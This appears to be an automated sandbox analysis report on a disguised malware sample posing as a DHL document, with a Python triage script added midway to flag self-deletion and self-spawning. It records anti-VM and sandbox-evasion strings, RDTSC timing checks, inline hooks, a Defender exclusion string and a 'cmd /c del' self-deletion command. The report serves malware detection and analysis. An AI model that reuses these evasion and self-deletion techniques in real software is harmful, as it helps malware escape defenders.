Source: Binary string: wntdll.pdb source: DHL DOC 3406506482.exe, 00000001.00000002.316428940.000000000106F000.00000040.00000001.sdmp, DHL DOC 3406506482.exe, 00000001.00000002.316230194.0000000000F50000.00000040.00000001.sdmp, explorer.exe, explorer.exe, 0000000E.00000002.514321960.00000000049E0000.00000040.00000001.sdmp, explorer.exe, 0000000E.00000002.514487240.0000000004AFF000.00000040.00000001.sdmp
Source: Binary string: explorer.pdb source: DHL DOC 3406506482.exe, 00000001.00000002.317544821.00000000033E0000.00000040.00020000.sdmp

Data Obfuscation:

.NET source code contains potential unpacker
Source: DHL DOC 3406506482.exe, Views/MainForm.cs | .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.0.DHL DOC 3406506482.exe.3b0000.0.unpack, Views/MainForm.cs | .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 0.2.DHL DOC 3406506482.exe.3b0000.0.unpack, Views/MainForm.cs | .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.DHL DOC 3406506482.exe.490000.3.unpack, Views/MainForm.cs | .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.DHL DOC 3406506482.exe.490000.9.unpack, Views/MainForm.cs | .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.DHL DOC 3406506482.exe.490000.5.unpack, Views/MainForm.cs | .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.DHL DOC 3406506482.exe.490000.2.unpack, Views/MainForm.cs | .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.2.DHL DOC 3406506482.exe.490000.1.unpack, Views/MainForm.cs | .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.DHL DOC 3406506482.exe.490000.1.unpack, Views/MainForm.cs | .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.DHL DOC 3406506482.exe.490000.7.unpack, Views/MainForm.cs | .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: 1.0.DHL DOC 3406506482.exe.490000.0.unpack, Views/MainForm.cs | .Net Code: CF234052 System.Reflection.Assembly System.Reflection.Assembly::Load(System.Byte[])
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 0_2_00DF41E1 push ebp; retn 0004h
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 0_2_00DF4219 push esi; retn 0004h
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 0_2_00DFE5DB push es; retf
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 0_2_00DFE683 push es; retf
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 0_2_00DFE768 pushfd ; ret
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 0_2_00DFB109 pushfd ; retn 0004h
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 0_2_00DFDC38 push cs; retf
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_00416913 pushad ; ret
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_00409BA8 push ebp; ret
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_00409BA8 push ebp; ret
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_0041D4B5 push eax; ret
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_0041D56C push eax; ret
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_0041D502 push eax; ret
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_0041D50B push eax; ret
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe | Code function: 1_2_0041664D push di; retf
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_04A5D0D1 push ecx; ret
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_02D79BA8 push ebp; ret
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_02D86913 pushad ; ret
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_02D8664D push di; retf
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_02D8D4B5 push eax; ret
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_02D8D56C push eax; ret
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_02D8D50B push eax; ret
Source: C:\Windows\SysWOW64\explorer.exe | Code function: 14_2_02D8D502 push eax; ret
Source: initial sample | Static PE information: section name: .text entropy: 7.85043153763

          Hooking and other Techniques for Hiding and Protection:

          barindex
          Modifies the prolog of user mode functions (user mode inline hooks)Show sources
          Source: explorer.exeUser mode code has changed: module: user32.dll function: PeekMessageA new code: 0x48 0x8B 0xB8 0x82 0x2E 0xE6
          Self deletion via cmd deleteShow sources
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: /c del "C:\Users\user\Desktop\DHL DOC 3406506482.exe"
          Source: C:\Windows\SysWOW64\explorer.exeProcess created: /c del "C:\Users\user\Desktop\DHL DOC 3406506482.exe"
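The self-deletion signature above and the "Process created" entries earlier in the report describe the same process tree: the sample relaunches a copy of itself, the 64-bit C:\Windows\explorer.exe starts its 32-bit SysWOW64 copy, and that copy, not the sample, runs cmd.exe /c del against the sample's own path. The script below is an added example, not part of the report, that takes the seven creation events as structured records and flags the three things a triage analyst would pull out of them: a del command aimed at the image of a process that ran in the trace, a process spawning its own image, and explorer.exe launching its SysWOW64 copy. The events are transcribed from this report in the order listed; the "unknown" parent is recorded as None. The SysWOW64-explorer check is a heuristic of mine, not the sandbox's rule.

```python
import re
import ntpath

# Constructed from the "Process created" lines of this report, in the order they appear:
# (parent image, child image, child command line). The report shows the self-spawn and the
# cmd.exe deletion twice each, so they appear twice here as well.
EVENTS = [
    (None, r"C:\Users\user\Desktop\DHL DOC 3406506482.exe", r'"C:\Users\user\Desktop\DHL DOC 3406506482.exe"'),
    (r"C:\Users\user\Desktop\DHL DOC 3406506482.exe", r"C:\Users\user\Desktop\DHL DOC 3406506482.exe", r"C:\Users\user\Desktop\DHL DOC 3406506482.exe"),
    (r"C:\Windows\explorer.exe", r"C:\Windows\SysWOW64\explorer.exe", r"C:\Windows\SysWOW64\explorer.exe"),
    (r"C:\Windows\SysWOW64\explorer.exe", r"C:\Windows\SysWOW64\cmd.exe", r'/c del "C:\Users\user\Desktop\DHL DOC 3406506482.exe"'),
    (r"C:\Windows\SysWOW64\cmd.exe", r"C:\Windows\System32\conhost.exe", r"C:\Windows\system32\conhost.exe 0xffffffff -ForceV1"),
    (r"C:\Users\user\Desktop\DHL DOC 3406506482.exe", r"C:\Users\user\Desktop\DHL DOC 3406506482.exe", r"C:\Users\user\Desktop\DHL DOC 3406506482.exe"),
    (r"C:\Windows\SysWOW64\explorer.exe", r"C:\Windows\SysWOW64\cmd.exe", r'/c del "C:\Users\user\Desktop\DHL DOC 3406506482.exe"'),
]

DEL_RE = re.compile(r"\b(?:del|erase)\b(.*)", re.IGNORECASE)
ARG_RE = re.compile(r'"([^"]*)"|(\S+)')


def norm(path):
    """Case-insensitive, backslash-normalised form of a Windows path (works off-Windows too)."""
    return ntpath.normcase(path)


def del_targets(cmdline):
    """Paths named by a cmd.exe del/erase command inside cmdline; [] if there is none.

    Only the first command of a chain is parsed (stops at &, &&, |, ||) and del's own
    switches (/f, /q, ...) are skipped, so both quoted and bare paths come back as written.
    """
    m = DEL_RE.search(cmdline)
    if not m:
        return []
    first_cmd = re.split(r"\s*(?:&&|\|\||[&|])\s*", m.group(1))[0]
    return [quoted or bare for quoted, bare in ARG_RE.findall(first_cmd)
            if not (quoted or bare).startswith("/")]


def find_self_deletion(events):
    """cmd.exe del commands whose target is the image of a process that ran in this trace."""
    ran = {norm(child) for _, child, _ in events}
    hits = []
    for parent, child, cmdline in events:
        if ntpath.basename(norm(child)) != "cmd.exe":
            continue
        for target in del_targets(cmdline):
            if norm(target) in ran:
                hits.append({"issued_by": parent, "target": target})
    return hits


def find_self_spawn(events):
    """Children whose image equals the parent's image (a process re-executing itself)."""
    return [child for parent, child, _ in events if parent and norm(parent) == norm(child)]


def find_wow64_explorer(events):
    """64-bit explorer.exe starting its SysWOW64 copy; uncommon in normal use (heuristic, not the sandbox's rule)."""
    return [(p, c) for p, c, _ in events
            if p and norm(p) == r"c:\windows\explorer.exe" and norm(c) == r"c:\windows\syswow64\explorer.exe"]


if __name__ == "__main__":
    for hit in find_self_deletion(EVENTS):
        print("self-deletion: %s deletes %s" % (hit["issued_by"], hit["target"]))
    for child in find_self_spawn(EVENTS):
        print("self-spawn: %s" % child)
    for parent, child in find_wow64_explorer(EVENTS):
        print("wow64 explorer: %s -> %s" % (parent, child))
```

The deletion is issued by a process that is not an ancestor of the sample in this tree, which is why matching the del target against every image that ran in the trace, rather than only against the deleter's own parent chain, is what catches it. The conhost.exe 0xffffffff -ForceV1 entry is cmd.exe's normal console host and is left unflagged.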
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
          Source: C:\Users\user\Desktop\DHL DOC 3406506482.exeProcess information set: NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\explorer.exe Process information set: NOGPFAULTERRORBOX | NOOPENFILEERRORBOX
Source: C:\Windows\SysWOW64\cmd.exe Process information set: NOOPENFILEERRORBOX

          Malware Analysis System Evasion:

Yara detected AntiVM3
Source: Yara match File source: 0.2.DHL DOC 3406506482.exe.27b13c4.1.raw.unpack, type: UNPACKEDPE
Source: Yara match File source: 00000000.00000002.248588915.0000000002791000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: 00000000.00000002.248628674.00000000027CD000.00000004.00000001.sdmp, type: MEMORY
Source: Yara match File source: Process Memory Space: DHL DOC 3406506482.exe PID: 4824, type: MEMORYSTR
Tries to detect sandboxes and other dynamic analysis tools (process name or module or function)
Source: DHL DOC 3406506482.exe, 00000000.00000002.248588915.0000000002791000.00000004.00000001.sdmp, DHL DOC 3406506482.exe, 00000000.00000002.248628674.00000000027CD000.00000004.00000001.sdmp Binary or memory string: SBIEDLL.DLL
Source: DHL DOC 3406506482.exe, 00000000.00000002.248588915.0000000002791000.00000004.00000001.sdmp, DHL DOC 3406506482.exe, 00000000.00000002.248628674.00000000027CD000.00000004.00000001.sdmp Binary or memory string: KERNEL32.DLL.WINE_GET_UNIX_FILE_NAME
Tries to detect virtualization through RDTSC time measurements
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe RDTSC instruction interceptor: First address: 0000000000409904 second address: 000000000040990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe RDTSC instruction interceptor: First address: 0000000000409B7E second address: 0000000000409B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe RDTSC instruction interceptor: First address: 0000000002D79904 second address: 0000000002D7990A instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Windows\SysWOW64\explorer.exe RDTSC instruction interceptor: First address: 0000000002D79B7E second address: 0000000002D79B84 instructions: 0x00000000 rdtsc 0x00000002 xor ecx, ecx 0x00000004 add ecx, eax 0x00000006 rdtsc
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe TID: 2248 Thread sleep time: -34821s >= -30000s
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe TID: 2888 Thread sleep time: -922337203685477s >= -30000s
Source: C:\Windows\explorer.exe TID: 5020 Thread sleep time: -36000s >= -30000s
Source: C:\Windows\SysWOW64\explorer.exe TID: 4840 Thread sleep time: -32000s >= -30000s
Source: C:\Windows\explorer.exe Last function: Thread delayed
Source: C:\Windows\SysWOW64\explorer.exe Last function: Thread delayed
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe Code function: 1_2_00409AB0 rdtsc
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe Thread delayed: delay time: 922337203685477
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe Process information queried: ProcessInformation
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe Thread delayed: delay time: 34821
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe Thread delayed: delay time: 922337203685477
Source: DHL DOC 3406506482.exe, 00000000.00000002.248628674.00000000027CD000.00000004.00000001.sdmp Binary or memory string: VMware SVGA IIBAdd-MpPreference -ExclusionPath "
Source: explorer.exe, 00000002.00000000.294199166.000000000891C000.00000004.00000001.sdmp Binary or memory string: VMware SATA CD00dRom0
Source: explorer.exe, 00000002.00000000.278703842.0000000008AEA000.00000004.00000001.sdmp Binary or memory string: AGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: DHL DOC 3406506482.exe, 00000000.00000002.248628674.00000000027CD000.00000004.00000001.sdmp Binary or memory string: InstallPathJC:\PROGRAM FILES\VMWARE\VMWARE TOOLS\
Source: explorer.exe, 00000002.00000000.279700736.000000000DC20000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}
Source: explorer.exe, 00000002.00000000.252879349.0000000003710000.00000004.00000001.sdmp Binary or memory string: \\?\scsi#cdrom&ven_necvmwar&prod_vmware_sata_cd00#5&280b647&0&000000#{53f56308-b6bf-11d0-94f2-00a0c91efb8b}
Source: DHL DOC 3406506482.exe, 00000000.00000002.248628674.00000000027CD000.00000004.00000001.sdmp Binary or memory string: vmware
Source: explorer.exe, 00000002.00000000.279700736.000000000DC20000.00000004.00000001.sdmp Binary or memory string: \\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000025700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#000000001F400000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000026700000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\STORAGE#Volume#{e6e9dfc6-98f2-11e9-90ce-806e6f6e6963}#0000000000100000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}\\?\SCSI#CdRom&Ven_Msft&Prod_Virtual_DVD-ROM#2&1f4adffe&0&000001#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}Packages
Source: explorer.exe, 00000002.00000000.377785658.00000000011B3000.00000004.00000020.sdmp Binary or memory string: SCSI\Disk&Ven_VMware&Prod_Virtual_disk\5&1ec51bf7&0&000000tft\0
Source: explorer.exe, 00000002.00000000.276642485.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CDROM&VEN_NECVMWAR&PROD_VMWARE_SATA_CD00\5&280B647&0&000000%
Source: explorer.exe, 00000002.00000000.253873142.00000000053C4000.00000004.00000001.sdmp Binary or memory string: \\?\SCSI#CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00#5&280b647&0&000000#{53f5630d-b6bf-11d0-94f2-00a0c91efb8b}>'R\"
Source: explorer.exe, 00000002.00000000.276642485.00000000089B5000.00000004.00000001.sdmp Binary or memory string: SCSI\CdRom&Ven_NECVMWar&Prod_VMware_SATA_CD00\5&280b647&0&0000002
Source: DHL DOC 3406506482.exe, 00000000.00000002.248628674.00000000027CD000.00000004.00000001.sdmp Binary or memory string: VMWAREDSOFTWARE\VMware, Inc.\VMware Tools
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe Code function: 1_2_00409AB0 rdtsc
Source: C:\Users\user\Desktop\DHL DOC 3406506482.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\explorer.exe Process token adjusted: Debug
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A320A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A490AF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A3F0BF mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A3F0BF mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A09080 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A83884 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A1849B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A058EC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04AC14FB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A86CF0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A9B8D0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A9B8D0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04AD8CD6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A1B02A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A3002D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A3BC2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04AD740D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A86C0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04AC1C06 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04AD4015 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A87016 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A2746D mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04AD1074 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04AC2073 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A3A44B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A20050 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A9C450 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A335A1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A361A0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A869A6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A31DB5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A851BE mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A2C182 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A32581 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A3A185 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A02D8A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A32990 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A3FD9B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A0B1E1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A941E8 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A1D5E0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04AB8DF1 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A86DC9 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A86DC9 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A24120 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A24120 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A0AD30 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A13D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A34D3B mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04AD8D34 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A3513A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A8A537 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A09100 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A0C962 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A0B171 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A2C577 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A2B944 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A43D43 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A83540 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A27D50 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A052A5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04AD0EA5 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A846A7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A1AAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A3FAB0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A9FE87 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A3D294 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A316E0 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A176E2 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A32AE4 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A48EC7 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A32ACB mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04ABFEC0 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A336CC mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04AD8ED6 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A0E620 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A44A2C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04ABFE3F mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A0C600 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A38E00 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A18A0A mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A05210 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A05210 mov ecx, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A0AA16 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A23A1C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A3A61C mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04ABB260 mov eax, dword ptr fs:[00000030h]
Source: C:\Windows\SysWOW64\explorer.exe Code function: 14_2_04A1766D mov eax, dword ptr fs:[00000030h]
